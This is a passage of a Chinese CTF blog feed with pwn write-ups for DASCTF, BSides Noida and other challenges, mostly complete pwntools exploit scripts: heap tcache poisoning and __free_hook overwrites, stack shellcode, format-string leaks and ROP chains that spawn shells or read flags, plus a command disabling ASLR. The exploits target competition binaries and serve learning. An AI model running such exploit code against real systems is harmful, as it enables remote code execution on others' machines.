class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">cmd</span>):</span></span><br><span class="line"> sla(<span class="string">'>>'</span>,<span class="built_in">str</span>(cmd))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">idx,size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(idx)) <span class="comment">#<=15</span></span><br><span class="line"> sla(<span class="string">'size?'</span>,<span class="built_in">str</span>(size)) <span class="comment">#<=0x400</span></span><br><span class="line"> sa(<span class="string">'content?'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"> sla(<span class="string">'size?'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> sa(<span class="string">'content?'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">idx</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>): <span class="comment">#0-8</span></span><br><span class="line"> add(i,<span class="number">0x100</span>,<span class="string">'a\n'</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">0x10</span>,<span class="string">'a\n'</span>)</span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x10</span>,<span class="string">'a\n'</span>)</span><br><span class="line">add(<span class="number">11</span>,<span class="number">0x10</span>,<span class="string">'a\n'</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line"> dele(i)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x40</span>,<span class="string">'\n'</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">libc.address = u64(ru(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x3ebd0a</span></span><br><span class="line">leak(<span class="string">'libc.address'</span>,libc.address)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">11</span>)</span><br><span class="line">dele(<span class="number">10</span>)</span><br><span class="line">cmd(<span class="number">1</span>)</span><br><span class="line">sla(<span class="string">'idx?'</span>,<span class="built_in">str</span>(<span class="number">9</span>)) <span class="comment">#<=15</span></span><br><span class="line">sla(<span class="string">'size?'</span>,<span class="built_in">str</span>(-<span class="number">1</span>)) <span class="comment">#<=0x400</span></span><br><span class="line">edit(<span class="number">9</span>,<span class="number">0x300</span>,p64(<span class="number">0</span>)*<span class="number">3</span>+p64(<span class="number">0x21</span>)+p64(libc.sym[<span class="string">'__free_hook'</span>])+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x10</span>,<span class="string">'/bin/sh\x00\n'</span>)</span><br><span class="line">add(<span class="number">11</span>,<span class="number">0x10</span>,p64(libc.sym[<span class="string">'system'</span>])+<span class="string">'\n'</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">10</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="天翼杯"><a href="#天翼杯" class="headerlink" title="天翼杯"></a>天翼杯</h1><h2 id="overheap"><a href="#overheap" class="headerlink" title="overheap"></a>overheap</h2><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$</span>./libc.so.<span class="number">6</span> </span><br><span class="line">GNU C Library (Ubuntu GLIBC <span class="number">2.34</span><span class="literal">-0ubuntu1</span>) stable release version <span class="number">2.34</span>.</span><br><span class="line"></span><br><span class="line">sudo sh <span class="literal">-c</span> <span class="string">"echo 0 > /proc/sys/kernel/randomize_va_space"</span></span><br></pre></td></tr></table></figure><p>为了对齐要爆破一位</p>]]></content>
<summary type="html"><blockquote>
<p>放假一直在划水,最近几次比赛题目都挺常规的,借此把堆栈题解题技巧复习一遍</p>
</blockquote></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>BUU月赛</title>
<link href="https://brooke-hub.github.io/2021/09/26/BUU%E6%9C%88%E8%B5%9B/"/>
<id>https://brooke-hub.github.io/2021/09/26/BUU%E6%9C%88%E8%B5%9B/</id>
<published>2021-09-26T02:28:57.000Z</published>
<updated>2021-09-26T02:40:51.698Z</updated>
<content type="html"><![CDATA[<blockquote><p>争取以后每个月赛都参加!</p></blockquote><span id="more"></span><h1 id="DASCTF-Sept-X-浙江工业大学秋季挑战赛"><a href="#DASCTF-Sept-X-浙江工业大学秋季挑战赛" class="headerlink" title="DASCTF Sept X 浙江工业大学秋季挑战赛"></a>DASCTF Sept X 浙江工业大学秋季挑战赛</h1><p><img src="/2021/09/26/BUU%E6%9C%88%E8%B5%9B/image-20210926103720313.png" alt="image-20210926103720313"></p><h2 id="hehepwn"><a href="#hehepwn" class="headerlink" title="hehepwn"></a>hehepwn</h2><p>栈溢出payload会被’\x00’截断,那就只覆盖个返回地址</p><p>泄露栈地址,然后栈溢出跳到栈上的shellcode</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'node4.buuoj.cn'</span>, <span class="number">28964</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./bypwn"</span>)</span><br><span class="line"></span><br><span class="line">libc=ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">elf=ELF(<span class="string">'./bypwn'</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">sla(<span class="string">'input:'</span>,<span class="string">'a'</span>*<span class="number">0x20</span>)</span><br><span class="line">stack_addr = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">leak(<span class="string">'stack_addr'</span>,stack_addr)</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line"></span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line">pay=shellcode.ljust(<span class="number">0x58</span>,<span class="string">'b'</span>)</span><br><span class="line">pay+=p64(stack_addr-<span class="number">0x50</span>)</span><br><span class="line"></span><br><span class="line">sla(<span class="string">'EASY PWN PWN PWN~'</span>,pay)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h2 id="hahapwn"><a href="#hahapwn" class="headerlink" title="hahapwn"></a>hahapwn</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'node4.buuoj.cn'</span>, <span class="number">29107</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(<span class="string">"./pwn"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># libc=ELF('libc.so.6')</span></span><br><span class="line">libc=ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">elf=ELF(<span class="string">'./pwn'</span>)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line">pay=<span class="string">'%25$p.%27$p.%28$p'</span></span><br><span class="line">pay=pay.ljust(<span class="number">0x20</span>,<span class="string">'\x00'</span>)</span><br><span class="line">pay+=<span class="string">'flag\x00\x00\x00\x00'</span></span><br><span class="line">sla(<span class="string">'What is your name?'</span>,pay)</span><br><span class="line"><span class="comment"># 0x6ffc4</span></span><br><span class="line">ru(<span class="string">'0x'</span>)</span><br><span class="line">libc_base = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'.'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>) - <span class="number">0x6ffc4</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">libc.address=libc_base</span><br><span class="line">ru(<span class="string">'0x'</span>)</span><br><span class="line">canary = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'.'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">leak(<span class="string">'canary'</span>,canary)</span><br><span class="line"><span class="comment"># 0xe0</span></span><br><span class="line">ru(<span class="string">'0x'</span>)</span><br><span class="line">stack_addr = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">flag=stack_addr -<span class="number">0xe0</span></span><br><span class="line">leak(<span class="string">'flag'</span>,flag)</span><br><span class="line"></span><br><span class="line">pop_rdi=<span class="number">0x0000000000400943</span></span><br><span class="line">pop_rsi=<span class="number">0x00000000000202f8</span>+libc_base</span><br><span class="line">pop_rdx=<span class="number">0x0000000000001b92</span>+libc_base</span><br><span class="line"></span><br><span class="line">orw_rop=<span class="string">'a'</span>*(<span class="number">0x70</span>-<span class="number">8</span>)+p64(canary)+p64(<span class="number">0</span>)</span><br><span class="line">orw_rop+=p64(pop_rdi)+p64(flag)</span><br><span class="line">orw_rop+=p64(pop_rsi)+p64(<span class="number">0</span>)</span><br><span class="line">orw_rop+=p64(libc.sym[<span class="string">'open'</span>])</span><br><span class="line">orw_rop+=p64(pop_rdi)+p64(<span class="number">3</span>)</span><br><span class="line">orw_rop+=p64(pop_rsi)+p64(flag)</span><br><span class="line">orw_rop+=p64(pop_rdx)+p64(<span class="number">0x50</span>)</span><br><span class="line">orw_rop+=p64(libc.sym[<span class="string">'read'</span>])</span><br><span class="line">orw_rop+=p64(pop_rdi)+p64(<span class="number">1</span>)</span><br><span class="line">orw_rop+=p64(pop_rsi)+p64(flag)</span><br><span class="line">orw_rop+=p64(pop_rdx)+p64(<span class="number">0x50</span>)</span><br><span class="line">orw_rop+=p64(libc.sym[<span class="string">'write'</span>])</span><br><span class="line"></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">sla(<span class="string">'What can we help you?'</span>,orw_rop)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h2 id="datasystem"><a href="#datasystem" class="headerlink" title="datasystem"></a>datasystem</h2>]]></content>
<summary type="html"><blockquote>
<p>争取以后每个月赛都参加!</p>
</blockquote></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
<title>BSides-Noida-CTF-master_2021_pwn_复现</title>
<link href="https://brooke-hub.github.io/2021/09/23/BSides-Noida-CTF-master-2021-pwn-%E5%A4%8D%E7%8E%B0/"/>
<id>https://brooke-hub.github.io/2021/09/23/BSides-Noida-CTF-master-2021-pwn-%E5%A4%8D%E7%8E%B0/</id>
<published>2021-09-23T01:15:09.000Z</published>
<updated>2021-09-23T09:17:05.960Z</updated>
<content type="html"><![CDATA[<p>还有一道musl uaf一道kernel rop</p><p>之后补上(如果记得的话</p><span id="more"></span><h1 id="teen-sum"><a href="#teen-sum" class="headerlink" title="teen-sum"></a>teen-sum</h1><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">checksec teen-sum</span></span><br><span class="line">[*] '/home/wendy/Desktop/BSides-Noida-CTF-master/Pwn/teen-sum/teen-sum'</span><br><span class="line"> Arch: amd64-64-little</span><br><span class="line"> RELRO: Full RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: PIE enabled</span><br><span class="line"> RUNPATH: '.'</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>两次机会输入name,一次泄露栈内容得到libc</p><p>一次栈溢出,注意要把name_sz覆盖为数字,同时glibc2.23以上版本的栈溢出需要加ret调栈</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line">binary=<span class="string">'./teen-sum'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc.so.6'</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'39.96.88.40'</span>, <span class="number">7020</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">':'</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x227e0a</span></span><br><span class="line"><span class="comment"># 0x48</span></span><br><span class="line"></span><br><span class="line">sla(<span class="string">'> '</span>,<span class="built_in">str</span>(<span class="number">0x10</span>))</span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">''</span>)</span><br><span class="line">libc_base = u64(ru(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x223e0a</span></span><br><span class="line">leak(<span class="string">'libc_base'</span>,libc_base)</span><br><span class="line">binsh=libc_base+<span class="built_in">next</span>(libc.search(<span class="string">b'/bin/sh'</span>))</span><br><span class="line">pop_rdi = libc_base+<span class="number">0x0000000000026b72</span></span><br><span class="line">system = libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line">ret = libc_base+<span class="number">0x0000000000025679</span></span><br><span class="line"></span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">'1'</span>)</span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">'1'</span>)</span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">'1'</span>)</span><br><span class="line">pause()</span><br><span class="line">sla(<span class="string">'New size please.> '</span>,<span class="built_in">str</span>(<span class="number">0x100</span>))</span><br><span class="line">pause()</span><br><span class="line">sla(<span class="string">'> '</span>,<span class="string">'a'</span>*<span class="number">0x38</span>+p64(<span class="number">0</span>)+<span class="string">'a'</span>*<span class="number">8</span>+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system))</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><h1 id="warmup"><a href="#warmup" class="headerlink" title="warmup"></a>warmup</h1><p>malloc没有清空chunk,可以泄露libc,这里写入的时候会再size-1处置0,puts输出会被截断,但是size为0就不影响泄露了</p><p>然后有一次uaf机会,打tcache,注意2.32版本多了一个key检查</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./warmup'</span></span><br><span class="line">elf=ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">'/home/wendy/Desktop/glibc-all-in-one/libs/2.32-0ubuntu3_amd64/libc.so.6'</span>)</span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'47.104.70.90'</span>, <span class="number">25315</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process(binary)</span><br><span class="line"></span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leaklibc</span>():</span></span><br><span class="line"> <span class="keyword">global</span> libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_,_IO_list_all,realloc</span><br><span class="line"> libc_base = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">'\x00'</span>)) - <span class="number">0x1e4030</span></span><br><span class="line"> success(<span class="string">'libc_base = '</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"> __malloc_hook=libc_base+libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line"> __free_hook=libc_base+libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line"> system=libc_base+libc.sym[<span class="string">'system'</span>]</span><br><span class="line"> realloc=libc_base+libc.sym[<span class="string">'realloc'</span>]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> sla(<span class="string">'> '</span>, <span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,sz,data</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index)) <span class="comment">#0-15</span></span><br><span class="line"> sla(<span class="string">'sz: '</span>,<span class="built_in">str</span>(sz)) <span class="comment">#<=0x1000</span></span><br><span class="line"> sa(<span class="string">'data: '</span>,data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,data</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> sa(<span class="string">'data: '</span>,data)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">save</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">5</span>)</span><br><span class="line"> sla(<span class="string">'idx: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x10</span>,<span class="string">'a'</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x500</span>,<span class="string">'b'</span>)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">0x20</span>,<span class="string">'a'</span>)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">0x20</span>,<span class="string">'a'</span>)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">0x20</span>,<span class="string">'a'</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0</span>,<span class="string">''</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">ru(<span class="string">'data: '</span>)</span><br><span class="line">key = u64(rc(<span class="number">5</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">leak(<span class="string">'key'</span>,key)</span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>,<span class="number">0</span>,<span class="string">''</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">leaklibc()</span><br><span class="line"></span><br><span class="line">dele(<span class="number">3</span>)</span><br><span class="line">save(<span class="number">4</span>)</span><br><span class="line">dele(<span class="number">4</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>,p64(__free_hook^key) + p64((key<<<span class="number">12</span>) + <span class="number">0x10</span>) + <span class="string">'\n'</span>)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">0x20</span>,<span class="string">'/bin/sh\x00\n'</span>)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">0x20</span>,p64(system)+<span class="string">'\n'</span>)</span><br><span class="line">dele(<span class="number">5</span>)</span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>还有一道musl uaf一道kernel rop</p>
<p>之后补上(如果记得的话</p></summary>
<category term="pwn" scheme="https://brooke-hub.github.io/tags/pwn/"/>
</entry>
<entry>
